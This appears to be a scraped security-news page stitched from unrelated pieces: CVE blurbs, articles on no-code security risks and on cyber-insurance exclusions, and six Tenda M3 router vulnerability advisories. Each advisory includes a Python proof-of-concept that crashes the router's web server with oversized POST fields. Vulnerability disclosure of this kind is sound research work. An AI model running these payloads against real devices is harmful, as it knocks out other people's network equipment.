The Leaflet Maps Marker (Google Maps, OpenStreetMap, Bing Maps) WordPress plugin before 3.12.5 does not properly sanitize some parameters before inserting them into SQL queries. As a result, high privilege users could perform SQL injection attacks.

CVE-2022-1123

The Stop Spam Comments WordPress plugin through 0.2.1.2 does not properly generate the Javascript access token for preventing abuse of comment section, allowing threat authors to easily collect the value and add it to the request.

CVE-2022-1663

Low/no-code tools allow citizen developers to design creative solutions to address immediate problems, but without sufficient training and oversight, the technology can make it easy to make security mistakes.

There used to be a time where risk-averse organizations could severely limit their business users' ability to make costly mistakes. With limited technical know-how, strict permissions, and lack of tailwind, the worst thing a business user could do was download malware or fall for a phishing campaign. Those days are now gone.

Nowadays, every major software-as-a-service (SaaS) platform comes bundled with automation and application-building capabilities that are designed for and marketed directly to business users. SaaS platforms like Microsoft 365, Salesforce, and ServiceNow are embedding no-code/low-code platforms into their existing offerings, placing them directly in the hands of business users without asking for corporate approval. Capabilities that were once available only to the IT and development teams are now available throughout the organization.

Power Platform, Microsoft's low-code platform, is built into Office 365 and is a great example due to Microsoft's strong foothold in the enterprise and the rate in which it is adopted by business users. Perhaps without realizing it, enterprises are placing developer-level power in the hands of more people than ever before, with far less security or technical savvy. What could possibly go wrong?

Quite a lot, actually. Let's examine a few real-world examples from my experience. The information has been anonymized, and business-specific processes were omitted.

**Situation 1: New Vendor? Just Do It**

The customer care team at a multinational retail company wanted to enrich their customer data with consumer insights. In particular, they were hoping to find more information about new customers so that they could better serve them, even during their initial purchase. The customer care team decided on a vendor they would like to work with. The vendor required data to be sent to them for enrichment, which would then be pulled back by their services.

Normally, this is where IT comes into the picture. IT would need to build some sort of integration to get data to and from the vendor. The IT security team would obviously need to be involved, too, to ensure this vendor can be trusted with customer data and approve the purchase. Procurement and legal would have taken a key part, as well. In this case, however, things went in a different direction.

This particular customer care team were Microsoft Power Platform experts. Instead of waiting around for resources or approval, they just went ahead and built the integration themselves: collecting customer data from SQL servers in production, forwarding it all to an FTP server provided by the vendor, and fetching enriched data back from the FTP server to the production database. The entire process was automatically executed every time a new customer was added to the database. This was all done through drag-and-drop interfaces, hosted on Office 365, and using their personal accounts. The license was paid out-of-pocket, which kept procurement out of the loop.

Imagine the CISO's surprise when they found a bunch of business automations moving customer data to a hard-coded IP address on AWS. Being an Azure-only customer, this raised a giant red flag. Furthermore, the data was being sent and received with an insecure FTP connection, creating a security and compliance risk. When the security team found this through a dedicated security tool, data had been moving in and out of the organization for almost a year.

**Situation 2: Ohh, Is It Wrong to Collect Credit Cards?**

The HR team at a large IT vendor was preparing for a once-a-year "Give Away" campaign, where employees are encouraged to donate to their favorite charity, with the company pitching in by matching every dollar donated by employees. The previous year's campaign was a massive success, so expectations were through the roof. To power the campaign and alleviate manual processes, a creative HR employee used Microsoft's Power Platform to create an app that facilitated the entire process. To register, an employee would log in to the application with their corporate account, submit their donation amount, select a charity, and provide their credit card details for payment.

The campaign was a huge success, with record-breaking participation by employees and little manual work required from HR employees. For some reason, though, the security team was not happy with the way things turned out. While registering to the campaign, an employee from the security team realized that credit cards were being collected in an app that did not look like it should be doing so. Upon investigation, they found that those credit card details were indeed improperly handled. Credit card details were stored in the default Power Platform environment, which means they were available to the entire Azure AD tenant, including all employees, vendors, and contractors. Furthermore, they were stored as simple plaintext string fields.

Fortunately, the data-processing violation was discovered by the security team before malicious actors — or compliance auditors — spotted it. The database was cleaned up, and the application was patched to properly handle financial information according to regulation.

**Situation 3: Why Can't I Just Use Gmail?**

As a user, nobody likes enterprise data loss prevention controls. Even when necessary, they introduce annoying friction to the day-to-day operations. As a result, users have always tried to circumvent them. One perennial tug-of-war between creative business users and the security team is corporate email. Syncing corporate email to a personal email account or corporate calendar to a personal calendar: Security teams have a solution for that. Namely, they put email security and DLP solutions in place to block email forwarding and ensure data governance. This solves the problem, right?

Well, no. A repeated finding across large enterprises and small businesses finds that users are creating automations that bypass email controls to forward their corporate email and calendar to their personal accounts. Instead of forwarding emails, they copy and paste data from one service to another. By logging into each service with a separate identity and automating the copy-paste process with no-code, business users bypass security controls with ease — and with no easy way for security teams to find out.

The Power Platform community has even developed templates that any Office 365 user can pick up and use.

**With Great Power Comes Great Responsibility**

Business user empowerment is great. Business lines should not be waiting for IT or fighting for development resources. However, we can't just give business users developer-level power with no guidance or guardrails and expect that everything will be alright.

Security teams need to educate business users and make them aware of their new responsibilities as application developers, even if those applications were built using "no code." Security teams should also put guardrails and monitoring in place to ensure that when business users make a mistake, like we all do, it will not snowball into full-blown data leaks or compliance audit incidents.

3 Ways No-Code Developers Can Shoot Themselves in the Foot

Businesses need to re-evaluate their cyber-insurance policies as firms like Lloyd's of London continue to add restrictions, including excluding losses related to state-backed cyberattackers.

Companies will need to re-evaluate their cyber-insurance premiums after major insurance companies have adopted exclusions for catastrophic cyberattacks conducted by "state-backed" actors.

This limits the risk that companies can offset with cyber insurance, security and risk experts tell Dark Reading — making taking out a policy potentially not worth it.

In the latest limits on cyber policies, insurance marketplace Lloyd's of London issued a notice on Aug. 16 to its member insurers, or syndicates, requiring that they exclude coverage for state-backed cyberattacks. The motive for the additional restrictions is to protect insurance companies and their underwriters from catastrophic loss, and help manage systemic risk that could overwhelm insurers, Lloyd's market bulletin stated.

**Is Cyber Insurance Still Worth It?**

While the insurers' position is understandable, businesses — which have already seen their premiums skyrocket over the past three years — should question whether insurance still mitigates risk effectively, says Pankaj Goyal, senior vice president of data science and cyber insurance at Safe Security, a cyber-risk analysis firm.

"Insurance works on trust, \[so answer the question,\] 'will an insurance policy keep me whole when a bad event happens?' " he says. "Today, the answer might be 'I don't know.' When customers lose trust, everyone loses, including the insurance companies."

The cyber-insurance industry has seen profits decline sharply in the past decade, as losses jumped from 35% of the revenue from premiums five years ago, to 72% in 2020. To adapt, insurance companies have dramatically raised the cost of policies — by 74% just in 2021, after rising 22% in 2020, according to FitchRatings.

    

Cyber insurance loss ratios peaked at 72% in 2020. Source: FitchRatings

Yet, insurance firms have also focused on limiting their liability. In 2021, global insurance firm AXA decided to stop paying ransoms to cybercriminals. And over the past two years, insurance companies have added act-of-war exclusions to their policies.

In its market bulletin (PDF), Lloyd's argued that the risk posed by cyberattacks continues to evolve and its members need to adapt to the threats posed by large or widely distributed attacks. While wartime risks are often excluded, Lloyd's requires that syndicates go further and ensure that certain policies have "a suitable clause excluding liability for losses arising from any state-backed cyberattack."

"If not managed properly it has the potential to expose the market to systemic risks that syndicates could struggle to manage," the insurance facilitator stated. "In particular, the ability of hostile actors to easily disseminate an attack, the ability for harmful code to spread, and the critical dependency that societies have on their IT infrastructure, including to operate physical assets, means that losses have the potential to greatly exceed what the insurance market is able to absorb."

The decisions come after pharmaceutical firm Merck won its lawsuit against its insurers after they refused to pay its $1.4 billion in business losses sustained in the NotPetya crypto-ransomware attack in 2017. The judge in the case ruled that the insurance policies' act-of-war exclusion did not apply, because the clause was meant to only exclude losses during armed conflicts.

Regardless, the policy changes are poorly thought out, some argue. 

 "Signs point to continued breaches and hacks, resulting in a longer claims process, and more litigations," says Goyal. "Unless the industry can collectively fix the way cyber insurance policies are understood, written and priced, ensuring that they are based on actual data and individual organizational risk — one size does not fit all — there is no end to the challenges and mistrust in cyber insurance."

**Too Broad an Exclusion**

The key problem is that the term "state-backed cyberattack" could be a very broad exclusion, and if abused by the insurance industry, one that will scuttle the usefulness of cyber insurance, experts say.

Attributing an attack to a nation-state is notoriously difficult, says James Turgal, vice president of cyber-risk and strategy for Optiv, a cybersecurity consultancy.

"Even if a computer involved in the attacks was traced back to an IP address located in an Iranian or North Korean military base, that doesn't necessarily mean that it was an attack done with the knowledge of or at the direction of the government's authorities," he says. "It could have been compromised by hackers in other countries \[as a false-flag attempt\]."

Currently, almost two-thirds of companies — 64% — suspect that they have been either directly targeted or impacted by a nation-state attack, says Kevin Bocek, vice president of security strategy and threat intelligence at Venafi. Many of the major sources of cyberattacks against North American, European, and Asian companies come from cybercriminal groups linked in some way with China, Iran, North Korea, or Russia. Whether that link will equate to being "state-backed" is an open question.

"These companies are clearly going to be worried about whether insurers will deem most attacks to be nation-state sponsored," he says. "As a result, we expect most businesses that are serious about security to double down on their efforts to protect themselves from hackers in the first place."

Insurers will have to develop clear guidelines regarding what evidence and data will be used to determine the attribution of an attack, and what behavior patterns or data points they will consider in determining whether an attack is state-backed, he says.

**Time to Beef Up Cyberdefenses**

Indeed, the exclusion will likely result in fewer companies relying on cyber insurance as a way to mitigate catastrophic risk. Instead, companies need to make sure that their cybersecurity controls and measures can mitigate the cost of any catastrophic attack, says David Lindner, chief information security officer at Contrast Security, an application security firm.

Creating data redundancies, such as backups, expanding visibility of network events, using a trusted forensics firm, and training all employees in cybersecurity can all help harden a business against cyberattacks and reduce damages.

"Organizations cannot just rely on their cyber insurance policy and must proactively protect themselves from these catastrophic cyberattacks," Lindner says.

Companies also should not expect insurance firms to reverse course. Their approach is just a continuation of the industry's reactive approach to cyber insurance, says Safe Security's Goyal. Insurance firms have increased premiums, put sub-limits on ransomware, and now, have adopted arguably broad exclusions, which may just result in delayed payouts and an increase in lawsuits when insurers refuse to pay out on a large policy.

Cyber-Insurance Firms Limit Payouts, Risk Obsolescence

Tenda M3 V1.0.0.12(4856) was discovered to contain a stack overflow vulnerability in the function formSetAdConfigInfo. This vulnerability allows attackers to cause a Denial of Service (DoS) via the authIPs parameter.

**Tenda M3 contains Stack Overflow Vulnerability****overview**

*   type: stack overflow vulnerability
    
*   supplier: Tenda https://www.tenda.com
    
*   product: TendaM3 https://www.tenda.com.cn/product/M3.html
    
*   firmware download: https://www.tenda.com.cn/download/detail-3133.html
    
*   affect version: TendaM3 v1.0.0.12(4856)
    

**Description****1\. Vulnerability Details**

the httpd in directory /bin has a stack buffer overflow. The vunlerability is in fucntion formSetAdConfigInfo

In this function, is copies POST parameter authIPs to stack buffer without checking its length, causing a stack buffer overflow vulnerability.

**2\. Recurring loopholes and POC**

use qemu-arm-static to run the httpd, we need to patch it before run.

*   in main function, The ConnectCfm function didn’t work properly, so I patched it to NOP
*   The R7WebsSecurityHandler function is used for permission control, and I've modified it to access URLs that can only be accessed after login

poc of DOS(deny of service)

import requests

data \= {
    "authIPs": "a"\*0x1000
}
cookies \= {
    "user": "admin"
}
res \= requests.post("http://127.0.0.1/goform/setAdConfigInfo", data\=data, cookies\=cookies)
print(res.content)

CVE-2022-38567: Vuln/Tenda M3/formSetAdConfigInfo_ at main · xxy1126/Vuln

Tenda M3 V1.0.0.12(4856) was discovered to contain a heap buffer overflow vulnerability in the function formEmailTest. This vulnerability allows attackers to cause a Denial of Service (DoS) via the mailname parameter.

**Tenda M3 contains heap buffer Overflow Vulnerability****overview**

*   type: heap buffer overflow vulnerability
    
*   supplier: Tenda https://www.tenda.com
    
*   product: TendaM3 https://www.tenda.com.cn/product/M3.html
    
*   firmware download: https://www.tenda.com.cn/download/detail-3133.html
    
*   affect version: TendaM3 v1.0.0.12(4856)
    

**Description****1\. Vulnerability Details**

the httpd in directory /bin has a heap buffer overflow. The vunlerability is in fucntion formEmailTest

It calls malloc(0x28Cu) to allocate heap buffer, and it copies POST parameter mailname to heap buffer.

v3 is the length of mailname, but it doesn’t limit it. so if v3>0x28C, the memcpy(v1, v2, v3) will cause heap buffer overflow

but it can cause segmentation fault when execute memcpy(v1, v2, v3)

**2\. Recurring loopholes and POC**

use qemu-arm-static to run the httpd, we need to patch it before run.

*   in main function, The ConnectCfm function didn’t work properly, so I patched it to NOP
*   The R7WebsSecurityHandler function is used for permission control, and I've modified it to access URLs that can only be accessed after login

poc of DOS(deny of service)

import requests

data \= {
    "mailname": "@"+"a"\*0x600, 
    "mailpwd": "a"
}
cookies \= {
    "user": "admin"
}
res \= requests.post("http://127.0.0.1/goform/testEmail", data\=data, cookies\=cookies)
print(res.content)

we can see the size of dest is 0x291 and size of src is 0x600

CVE-2022-38566: Vuln/Tenda M3/formEmailTest-mailname at main · xxy1126/Vuln

Tenda M3 V1.0.0.12(4856) was discovered to contain a heap buffer overflow vulnerability in the function formSetFixTools. This vulnerability allows attackers to cause a Denial of Service (DoS) via the MACAddr parameter.

**Tenda M3 contains heap Overflow Vulnerability****overview**

*   type: heap overflow vulnerability
    
*   supplier: Tenda https://www.tenda.com
    
*   product: TendaM3 https://www.tenda.com.cn/product/M3.html
    
*   firmware download: https://www.tenda.com.cn/download/detail-3133.html
    
*   affect version: TendaM3 v1.0.0.12(4856)
    

**Description****1\. Vulnerability Details**

the httpd in directory /bin has a heap buffer overflow. The vunlerability is in fucntion formSetFixTools

It calls malloc(0x28) to allocate heap buffer, and it copies POST parameterMACAddr tp heap buffer.

It didn’t check the value of v23 and calls strncpy, so there is a heap overflow.

**2\. Recurring loopholes and POC**

use qemu-arm-static to run the httpd, we need to patch it before run.

*   in main function, The ConnectCfm function didn’t work properly, so I patched it to NOP
*   The R7WebsSecurityHandler function is used for permission control, and I've modified it to access URLs that can only be accessed after login

poc of DOS(deny of service) **(We need to send request twice)**

import requests

data \= {
    "networkTool": "3",
	"operation": "start", 
	"MACAddr": "a"\*0x800
}
cookies \= {
    "user": "admin"
}
res \= requests.post("http://127.0.0.1/goform/setFixTools", data\=data, cookies\=cookies)
print(res.content)
res \= requests.post("http://127.0.0.1/goform/setFixTools", data\=data, cookies\=cookies)
print(res.content)

CVE-2022-38563: Vuln/Tenda M3/formSetFixTools_Mac at main · xxy1126/Vuln

Tenda M3 V1.0.0.12(4856) was discovered to contain a heap buffer overflow vulnerability in the function formEmailTest. This vulnerability allows attackers to cause a Denial of Service (DoS) via the mailpwd parameter.

**Tenda M3 contains heap buffer Overflow Vulnerability****overview**

*   type: heap buffer overflow vulnerability
*   supplier: Tenda https://www.tenda.com
*   product: TendaM3 https://www.tenda.com.cn/product/M3.html
*   firmware download: https://www.tenda.com.cn/download/detail-3133.html
*   affect version: TendaM3 v1.0.0.12(4856)

**Description****1\. Vulnerability Details**

the httpd in directory /bin has a heap buffer overflow. The vunlerability is in fucntion formEmailTest

It calls malloc(0x28Cu) to allocate heap buffer, and it copies POST parameter mailpwd to heap buffer.

v5 is the length of mailpwd, but it doesn’t limit it. so if v5>0x28C, the memcpy(v4, v20, v5) will cause heap buffer overflow

The progarm crashed when call malloc, the stack frame is below.

**2\. Recurring loopholes and POC**

use qemu-arm-static to run the httpd, we need to patch it before run.

*   in main function, The ConnectCfm function didn’t work properly, so I patched it to NOP
*   The R7WebsSecurityHandler function is used for permission control, and I've modified it to access URLs that can only be accessed after login

poc of DOS(deny of service)

import requests

data \= {
    "mailname": "@", 
    "mailpwd": "b"\*0x400
}
cookies \= {
    "user": "admin"
}
res \= requests.post("http://127.0.0.1/goform/testEmail", data\=data, cookies\=cookies)
print(res.content)

CVE-2022-38565: Vuln/Tenda M3/formEmailTest-mailpwd at main · xxy1126/Vuln

Tenda M3 V1.0.0.12(4856) was discovered to contain a heap buffer overflow vulnerability in the function formSetFixTools. This vulnerability allows attackers to cause a Denial of Service (DoS) via the hostname parameter.

**Tenda M3 contains heap Overflow Vulnerability****overview**

*   type: heap overflow vulnerability
    
*   supplier: Tenda https://www.tenda.com
    
*   product: TendaM3 https://www.tenda.com.cn/product/M3.html
    
*   firmware download: https://www.tenda.com.cn/download/detail-3133.html
    
*   affect version: TendaM3 v1.0.0.12(4856)
    

**Description****1\. Vulnerability Details**

the httpd in directory /bin has a heap buffer overflow. The vunlerability is in fucntion formSetFixTools

It calls malloc(0x28Cu) to allocate heap buffer, and it copies POST parameterhostname tp heap buffer.

If v3 > 0x50, that will cause heap overflow due to strncpy(v1, v2, c3)

**2\. Recurring loopholes and POC**

use qemu-arm-static to run the httpd, we need to patch it before run.

*   in main function, The ConnectCfm function didn’t work properly, so I patched it to NOP
*   The R7WebsSecurityHandler function is used for permission control, and I've modified it to access URLs that can only be accessed after login

poc of DOS(deny of service)

import requests

data \= {
    "networkTool": "1", 
	"hostName": "a"\*0x100
}
cookies \= {
    "user": "admin"
}
res \= requests.post("http://127.0.0.1/goform/setFixTools", data\=data, cookies\=cookies)
print(res.content)

CVE-2022-38568: Vuln/Tenda M3/formSetFixTools_hostname at main · xxy1126/Vuln

Tenda M3 V1.0.0.12(4856) was discovered to contain a heap buffer overflow vulnerability in the function formSetFixTools. This vulnerability allows attackers to cause a Denial of Service (DoS) via the lan parameter.

**Tenda M3 contains heap Overflow Vulnerability****overview**

*   type: heap overflow vulnerability
    
*   supplier: Tenda https://www.tenda.com
    
*   product: TendaM3 https://www.tenda.com.cn/product/M3.html
    
*   firmware download: https://www.tenda.com.cn/download/detail-3133.html
    
*   affect version: TendaM3 v1.0.0.12(4856)
    

**Description****1\. Vulnerability Details**

the httpd in directory /bin has a heap buffer overflow. The vunlerability is in fucntion formSetFixTools

It calls malloc(0x28) to allocate heap buffer, and it copies POST parameterlan tp heap buffer.

It didn’t check the value of v23 and calls strncpy, so there is a heap overflow.

**2\. Recurring loopholes and POC**

use qemu-arm-static to run the httpd, we need to patch it before run.

*   in main function, The ConnectCfm function didn’t work properly, so I patched it to NOP
*   The R7WebsSecurityHandler function is used for permission control, and I've modified it to access URLs that can only be accessed after login

poc of DOS(deny of service)

import requests

data \= {
    "networkTool": "3",
	"operation": "start", 
	"lan": "a"\*0x100
}
cookies \= {
    "user": "admin"
}
res \= requests.post("http://127.0.0.1/goform/setFixTools", data\=data, cookies\=cookies)
print(res.content)

Tag

#perl